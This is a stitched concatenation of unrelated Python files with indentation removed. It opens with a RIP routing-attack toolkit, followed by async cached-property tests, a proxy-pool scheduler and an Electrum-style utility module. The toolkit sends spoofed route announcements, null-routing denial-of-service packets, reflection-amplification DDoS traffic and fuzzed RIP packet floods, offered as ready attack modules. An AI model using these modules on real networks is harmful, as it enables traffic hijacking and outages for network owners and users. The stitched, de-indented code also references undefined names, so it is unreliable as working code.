if config['verbose'] or config['debug']:
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[.] ' + x)
@staticmethod
def dbg(x):
if config['debug']:
Logger._out('[dbg] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
# Admittedly, not a very fuzzy fuzzer.
class Fuzzer:
@staticmethod
def get8bitFuzzes():
out = set()
for i in range(9):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**8]
@staticmethod
def get16bitFuzzes():
out = set()
for i in range(17):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**16]
@staticmethod
def get32bitFuzzes():
out = set()
for i in range(33):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**32]
@staticmethod
def deBrujinPattern(length):
if length == 0: return ''
if length >= 20280:
out = ''
out += Fuzzer.deBrujinPattern(20280 - 1)
out += "A" * (length - 20280 - 1)
return out
pattern = ''
for upper in string.ascii_uppercase:
for lower in string.ascii_lowercase:
for digit in string.digits:
if len(pattern) < length:
pattern += upper + lower + digit
else:
out = pattern[:length]
return out
return pattern
@staticmethod
def getFuzzyStrings(maxLen = -1, allOfThem = True):
out = set()
for b in Fuzzer.get16bitFuzzes():
out.add(Fuzzer.deBrujinPattern(b))
if allOfThem:
for b in range(0, 65400, 256):
if maxLen != -1 and b > maxLen: break
out.add(Fuzzer.deBrujinPattern(b))
if maxLen != -1:
return set([x for x in out if len(x) <= maxLen])
return out
@staticmethod
def get32bitProblematicPowersOf2():
return Fuzzer.get32bitFuzzes()
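# Summary of the corpus produced above: the integer fuzz values are boundaries around powers
# of two (2**i - 2, 2**i - 1, 2**i, 2**i + 1) clipped to 8/16/32 bits, and the string fuzz
# values are cyclic alphanumeric patterns ("Aa0Aa1Aa2...") of those boundary lengths; the
# RIP fuzzing steps below iterate over these sets.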
class RoutingAttack:
def __init__(self):
pass
def injectOptions(self, params, config):
pass
def launch(self):
pass
class Sniffer(RoutingAttack):
def __init__(self):
pass
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
    def processPacket(self, pkt):
# TODO
raise Exception('Not yet implemented.')
def launch(self):
# TODO
raise Exception('Not yet implemented.')
def packetCallback(d):
self.processPacket(d)
try:
pkts = sniff(
count = 1000,
filter = 'udp port 520',
timeout = 10.0,
prn = packetCallback,
iface = self.config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
pass
else:
Logger.err('Exception occured during sniffing: {}'.format(str(e)))
except KeyboardInterrupt:
pass
class RIPv1v2Attacks(RoutingAttack):
ripAuthTypes = {
'simple' : 2, 'md5' : 3, 'md5authdata': 1
}
def __init__(self):
self.config = {
'interface' : '',
'delay': 1,
'network' : '',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
'version' : 0,
}
@staticmethod
def getRipAuth(config):
ripauth = RIPAuth()
ripauth.authtype = RIPv1v2Attacks.ripAuthTypes[config['auth-type']]
if ripauth.authtype == 2:
ripauth.password = config['auth-data']
elif ripauth.authtype == 1:
ripauth.authdata = config['auth-data']
elif ripauth.authtype == 3:
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = len(config['auth-data'])
ripauth.seqnum = 0
return ripauth
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
Logger.info("Fake Route Announcement to be injected:")
Logger.info("\tNetwork: {}".format(config['network']))
Logger.info("\tNetmask: {}".format(config['netmask']))
Logger.info("\tNexthop: {}".format(config['nexthop']))
Logger.info("\tMetric: {}".format(config['metric']))
if not config['network'] or not config['netmask'] \
or not config['nexthop'] or not config['metric']:
Logger.err("Module needs following options to operate: network, netmask, nexthop, metric")
return False
if params['version'] != 1 and params['version'] != 2:
Logger.err("RIP protocol version must be either 1 or 2 as passed in attacks params!")
return False
return True
def launch(self):
packet = self.getPacket()
Logger.info("Sending RIPv{} Spoofed Route Announcements...".format(self.config['version']))
sendp(packet, loop = 1, inter = self.config['delay'], iface = config['interface'])
def getPacket(self):
networkToAnnounce = self.config['network']
metricToAnnounce = self.config['metric']
netmaskToAnnounce = self.config['netmask']
nexthopToAnnounce = self.config['nexthop']
spoofedIp = self.config['spoof']
etherframe = Ether() # Start definition of Ethernet Frame
ip = IP() # IPv4 packet
udp = UDP()
udp.sport = 520 # According to RFC1058, 520/UDP port must be used for solicited communication
udp.dport = 520
rip = RIP()
ripentry = RIPEntry() # Announced route
ripentry.AF = "IP" # Address Family: IP
if 'AF' in self.config.keys():
ripentry.AF = self.config['AF']
ripentry.addr = networkToAnnounce # Spoof route for this network...
ripentry.metric = metricToAnnounce
if self.config['version'] == 1:
ip.dst = '255.255.255.255' # RIPv1 broadcast destination
etherframe.dst = 'ff:ff:ff:ff:ff:ff'
rip.version = 1 # RIPv1
rip.cmd = 2 # Command: Response
elif self.config['version'] == 2:
ip.dst = '224.0.0.9' # RIPv2 multicast destination
rip.version = 2 # RIPv2
rip.cmd = 2 # Command: Response
ripentry.RouteTag = 0
ripentry.mask = netmaskToAnnounce
ripentry.nextHop = nexthopToAnnounce # ... to be going through this next hop device.
if 'rip_cmd' in self.config.keys():
rip.cmd = self.config['rip_cmd']
if not self.config['auth-type']:
rip_packet = etherframe / ip / udp / rip / ripentry
else:
ripauth = RIPv1v2Attacks.getRipAuth(self.config)
Logger.info('Using RIPv2 authentication: type={}, pass="{}"'.format(
self.config['auth-type'], self.config['auth-data']
))
rip_packet = etherframe / ip / udp / rip / ripauth / ripentry
rip_packet[IP].src = spoofedIp
return rip_packet
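# Packet layering sketch (illustrative): getPacket() above assembles, in scapy terms,
# Ether() / IP(dst=255.255.255.255 or 224.0.0.9) / UDP(sport=520, dport=520) / RIP() /
# [RIPAuth()] / RIPEntry(), then overwrites the IP source with the spoofed address before
# launch() loops it out with sendp().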
class RIPFuzzer(RoutingAttack):
ripCommands = (
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
)
def __init__(self):
self.config = {
'interface' : '',
'network' : '192.168.1.0',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
}
def injectOptions(self, params, config):
self.config = config
self.params = params
return True
def launch(self):
        global stopThreads
        packets = set()
Logger.info("Generating fuzzed packets for RIPv1...")
packets.update(self.generateRipv1Packets())
Logger.info("Generating fuzzed packets for RIPv2...")
packets.update(self.generateRipv2Packets())
Logger.info("Collected in total {} packets to send. Sending them out...".format(len(packets)))
packetsLists = [[] for x in range(self.config['processors'])]
packetsList = list(packets)
for i in range(len(packetsList)):
packetsLists[i % config['processors']].append(packetsList[i])
jobs = []
for i in range(config['processors']):
task = multiprocessing.Process(target = flooder, args = (i, packetsLists[i]))
jobs.append(task)
task.daemon = True
task.start()
print('[+] Started flooding. Press CTRL-C to stop that.')
try:
while jobs:
jobs = [job for job in jobs if job.is_alive()]
except KeyboardInterrupt:
stopThreads = True
print('\n[>] Stopping...')
stopThreads = True
time.sleep(3)
Logger.ok("Fuzzing finished. Sent around {} packets.".format(len(packets)))
def generateRipv1Packets(self):
packets = set()
base = Ether(dst = 'ff:ff:ff:ff:ff:ff') / IP(dst = '255.255.255.255') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 3: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 4: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 5: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 1, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
def generateRipv2Packets(self):
packets = set()
base = Ether() / IP(src = self.config['spoof'], dst = '224.0.0.9') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Version values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 3: Fuzz on Authentication data values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
for auth in RIPFuzzer.fuzzRipv2Auth():
packets.add(base / rip / auth )
packets.add(base / rip / auth / RIPEntry() )
# Step 4: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 5: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 6: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 7: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 2, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
@staticmethod
def fuzzRipv2Auth():
auths = set()
# Step 1: Fuzz on RIPAuth authtype.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = val
ripauth.password = '0123456789abcdef'
auths.add(ripauth)
# Step 2: Fuzz on RIPAuth md5authdata structure's digestoffset.
for val in set(Fuzzer.get16bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = val
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 3: Fuzz on RIPAuth md5authdata structure's keyid.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = val
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 4: Fuzz on RIPAuth md5authdata structure's seqnum.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = val
auths.add(ripauth)
# Step 5: Fuzz on RIPAuth md5authdata structure's authdatalen.
for val in set(Fuzzer.getFuzzyStrings(maxLen = 16, allOfThem = False)):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = val
ripauth.seqnum = 0
auths.add(ripauth)
return auths
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.dbg('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def parseOptions(argv):
global config
print('''
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-D', '--debug', action='store_true', help='Display debug output.')
parser.add_argument('-d', '--delay', type=float, default=1.0, help='Delay in seconds (float) between sending consecutive packets. Default: 1 second. Not applies to fuzzers.')
parser.add_argument('-t', '--attack', metavar='ATTACK', default='', help='Select attack to launch. One can use: "-t list" to list available attacks.')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-s', '--spoof', help = 'IP address to be used as a spoofed/fake gateway, e.g. Attacker machine address. By default will try to figure out that address automatically.', default='')
auth = parser.add_argument_group('Routing Protocol Authentication', 'Specifies authentication data for Routing protocol to use')
auth.add_argument('--auth-type', help = 'Authentication type. Can be one of following: "simple", "md5authdata", "md5". Applies only to authentication-capable protocols, like RIPv2', default='')
auth.add_argument('--auth-data', help = 'Password / authentication data to pass in every packet. This field depends on the "--auth-type" used.', default='')
route = parser.add_argument_group('Spoofed Route injection', 'Specifies fake route details to inject')
route.add_argument('-a', '--network', help = 'IP address of network to announce, can be paired with netmask in CIDR notation. One can use "default" for 0.0.0.0')
route.add_argument('-b', '--netmask', help = 'Netmask to use (can be inferred from "--network". Default: /24', default='255.255.255.0')
route.add_argument('-c', '--nexthop', help = 'Spoofed next hop address. Default: 0.0.0.0.', default = '0.0.0.0')
route.add_argument('-m', '--metric', help = 'Metric to be used. The lower the greater priority it gets. Default: 10', type=int, default='10')
args = parser.parse_args()
    if not args.attack:
Logger.err('You must specify an attack to launch!')
return False
if args.attack == 'list':
print("Available attacks:")
for a in attacks:
print("\t{}. '{}' - {}".format(a['num'], a['name'], a['desc']))
sys.exit(0)
else:
att = args.attack
try:
att = int(att)
except: pass
for a in attacks:
if att == a['num'] or att == a['name']:
config['attack'] = a
break
if 'attack' not in config or not config['attack']:
Logger.err("Selected attack is not implemented or wrongly stated.")
parser.print_help()
return False
config['verbose'] = args.verbose
config['debug'] = args.debug
config['delay'] = args.delay
if args.interface != '': config['interface'] = args.interface
else: config['interface'] = selectDefaultInterface()
if args.network != '': config['network'] = args.network
if args.spoof != '': config['spoof'] = args.spoof
else: config['spoof'] = getIfaceIP(config['interface'])
Logger.info("Using {} as local/spoof IP address".format(config['spoof']))
if args.netmask != '': config['netmask'] = args.netmask
if args.nexthop != '': config['nexthop'] = args.nexthop
if args.metric != '': config['metric'] = args.metric
if args.auth_type != '': config['auth-type'] = args.auth_type
if args.auth_data != '': config['auth-data'] = args.auth_data
if config['auth-type'] != '':
if config['auth-data'] == '':
Logger.err("You must specify authentication data along with the --auth-type.")
return False
config['auth-type'] = args.auth_type
config['auth-data'] = args.auth_data
return args
def main(argv):
global attacks
attacks = (
{
'num': 0,
'name': 'sniffer',
'desc': '(NOT YET IMPLEMENTED) Sniffer hunting for authentication strings.',
'object': Sniffer,
'params': {
}
},
{
'num': 1,
'name': 'ripv1-route',
'desc': 'RIP Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
}
},
{
'num': 2,
'name': 'ripv1-dos',
'desc': 'RIPv1 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 1,
'network': '0.0.0.0',
'metric': 1
}
},
{
'num': 3,
'name': 'ripv1-ampl',
'desc': 'RIPv1 Reflection Amplification DDoS',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 0.5,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1,
'AF': 0, # Unspecified
'rip_cmd': 1, # Request
}
},
{
'num': 4,
'name': 'ripv2-route',
'desc': 'RIPv2 Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
}
},
{
'num': 5,
'name': 'ripv2-dos',
'desc': 'RIPv2 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 2,
'delay' : 1,
'network': '0.0.0.0',
'netmask': '0.0.0.0',
'nexthop': '0.0.0.1',
'metric': 1
}
},
{
'num': 6,
'name': 'rip-fuzzer',
'desc': 'RIP/RIPv2 packets fuzzer',
'object': RIPFuzzer,
'params': {
}
},
)
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
if os.getuid() != 0:
Logger.err('This program must be run as root.')
return False
load_contrib('ospf')
load_contrib('eigrp')
load_contrib('bgp')
attack = config['attack']['object']()
print("[+] Launching attack: {}".format(config['attack']['desc']))
if attack.injectOptions(config['attack']['params'], config):
attack.launch()
else:
Logger.err("Module prerequisite options were not passed correctly.")
if __name__ == '__main__':
main(sys.argv)
|
test_async_cached_property.py
|
# -*- coding: utf-8 -*-
import asyncio
import time
import unittest
from threading import Lock, Thread
from freezegun import freeze_time
import property_cached as cached_property
def unittest_run_loop(f):
def wrapper(*args, **kwargs):
coro = asyncio.coroutine(f)
future = coro(*args, **kwargs)
loop = asyncio.get_event_loop()
loop.run_until_complete(future)
return wrapper
def CheckFactory(cached_property_decorator, threadsafe=False):
"""
Create dynamically a Check class whose add_cached method is decorated by
the cached_property_decorator.
"""
class Check(object):
def __init__(self):
self.control_total = 0
self.cached_total = 0
self.lock = Lock()
async def add_control(self):
self.control_total += 1
return self.control_total
@cached_property_decorator
async def add_cached(self):
if threadsafe:
time.sleep(1)
# Need to guard this since += isn't atomic.
with self.lock:
self.cached_total += 1
else:
self.cached_total += 1
return self.cached_total
def run_threads(self, num_threads):
threads = []
for _ in range(num_threads):
def call_add_cached():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(self.add_cached)
thread = Thread(target=call_add_cached)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
return Check
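# Usage sketch (illustrative): CheckFactory(cached_property.cached_property) returns a Check
# class whose ``add_cached`` coroutine is computed once and then served from the cache; the
# assertions in TestCachedProperty below exercise exactly that behaviour.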
class TestCachedProperty(unittest.TestCase):
"""Tests for cached_property"""
cached_property_factory = cached_property.cached_property
async def assert_control(self, check, expected):
"""
        Assert that both `add_control` and `control_total` equal `expected`
"""
self.assertEqual(await check.add_control(), expected)
self.assertEqual(check.control_total, expected)
async def assert_cached(self, check, expected):
"""
        Assert that both `add_cached` and `cached_total` equal `expected`
"""
print("assert_cached", check.add_cached)
self.assertEqual(await check.add_cached, expected)
self.assertEqual(check.cached_total, expected)
@unittest_run_loop
async def test_cached_property(self):
Check = CheckFactory(self.cached_property_factory)
check = Check()
# The control shows that we can continue to add 1
await self.assert_control(check, 1)
await self.assert_control(check, 2)
# The cached version demonstrates how nothing is added after the first
await self.assert_cached(check, 1)
await self.assert_cached(check, 1)
# The cache does not expire
with freeze_time("9999-01-01"):
await self.assert_cached(check, 1)
        # Typically descriptors return themselves if accessed through the class
# rather than through an instance.
self.assertTrue(isinstance(Check.add_cached, self.cached_property_factory))
@unittest_run_loop
async def test_reset_cached_property(self):
Check = CheckFactory(self.cached_property_factory)
check = Check()
# Run standard cache assertion
await self.assert_cached(check, 1)
await self.assert_cached(check, 1)
# Clear the cache
del check.add_cached
# Value is cached again after the next access
await self.assert_cached(check, 2)
await self.assert_cached(check, 2)
@unittest_run_loop
async def test_none_cached_property(self):
class Check(object):
def __init__(self):
self.cached_total = None
@self.cached_property_factory
async def add_cached(self):
return self.cached_total
await self.assert_cached(Check(), None)
|
schedule.py
|
import time
from multiprocessing import Process
import asyncio
import aiohttp
try:
from aiohttp.errors import ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
except:
from aiohttp import ClientProxyConnectionError as ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
from proxypool.db import RedisClient
from proxypool.error import ResourceDepletionError
from proxypool.getter import FreeProxyGetter
from proxypool.setting import *
from asyncio import TimeoutError
class ValidityTester(object):
test_api = TEST_API
def __init__(self):
self._raw_proxies = None
self._usable_proxies = []
def set_raw_proxies(self, proxies):
self._raw_proxies = proxies
self._conn = RedisClient()
async def test_single_proxy(self, proxy):
"""
        Test one proxy; if it is valid, add it to the pool of usable proxies.
"""
try:
async with aiohttp.ClientSession() as session:
try:
if isinstance(proxy, bytes):
proxy = proxy.decode('utf-8')
real_proxy = 'http://' + proxy
print('Testing', proxy)
async with session.get(self.test_api, proxy=real_proxy, timeout=get_proxy_timeout) as response:
if response.status == 200:
self._conn.no_repeat_put(proxy)
print('Valid proxy', proxy)
except (ProxyConnectionError, TimeoutError, ValueError):
print('Invalid proxy', proxy)
except (ServerDisconnectedError, ClientResponseError,ClientConnectorError) as s:
print(s)
pass
def test(self):
"""
        Asynchronously test all raw proxies with aiohttp.
"""
print('ValidityTester is working')
try:
loop = asyncio.get_event_loop()
tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies]
loop.run_until_complete(asyncio.wait(tasks))
except ValueError:
print('Async Error')
class PoolAdder(object):
"""
add proxy to pool
"""
def __init__(self, threshold):
self._threshold = threshold
self._conn = RedisClient()
self._tester = ValidityTester()
self._crawler = FreeProxyGetter()
def is_over_threshold(self):
"""
        Check whether the number of proxies in the pool exceeds the threshold.
"""
if self._conn.queue_len >= self._threshold:
return True
else:
return False
def add_to_queue(self):
print('PoolAdder is working')
proxy_count = 0
while not self.is_over_threshold():
for callback_label in range(self._crawler.__CrawlFuncCount__):
callback = self._crawler.__CrawlFunc__[callback_label]
raw_proxies = self._crawler.get_raw_proxies(callback)
# test crawled proxies
self._tester.set_raw_proxies(raw_proxies)
self._tester.test()
proxy_count += len(raw_proxies)
if self.is_over_threshold():
print('IP is enough, waiting to be used')
break
if proxy_count == 0:
raise ResourceDepletionError
class Schedule(object):
@staticmethod
def valid_proxy(cycle=VALID_CHECK_CYCLE):
"""
        Re-test half of the proxies currently stored in redis.
"""
conn = RedisClient()
tester = ValidityTester()
while True:
print('Refreshing ip')
count = int(0.5 * conn.queue_len)
if count == 0:
print('Waiting for adding')
time.sleep(cycle)
continue
raw_proxies = conn.get(count)
tester.set_raw_proxies(raw_proxies)
tester.test()
time.sleep(cycle)
@staticmethod
def check_pool(lower_threshold=POOL_LOWER_THRESHOLD,
upper_threshold=POOL_UPPER_THRESHOLD,
cycle=POOL_LEN_CHECK_CYCLE):
"""
        If the number of proxies drops below lower_threshold, add more proxies.
"""
conn = RedisClient()
adder = PoolAdder(upper_threshold)
while True:
if conn.queue_len < lower_threshold:
adder.add_to_queue()
time.sleep(cycle)
def run(self):
print('Ip processing running')
valid_process = Process(target=Schedule.valid_proxy)
check_process = Process(target=Schedule.check_pool)
valid_process.start()
check_process.start()
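# Usage sketch (illustrative): the scheduler is started by constructing it and calling run(),
# e.g. ``Schedule().run()``, which launches the valid_proxy and check_pool processes above.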
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'BTX':8, 'mBTX':5, 'uBTX':2}
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
# Raise this exception to unwind the stack like a normal error,
# but, unlike other exceptions, without informing the user.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " BTX"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
localtime = time.localtime(time.time())
disptime = str(localtime.tm_hour)+":"+str(localtime.tm_min)+":"+str(localtime.tm_sec)
print_error("[%s]" % self.diagnostic_name(), disptime, *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
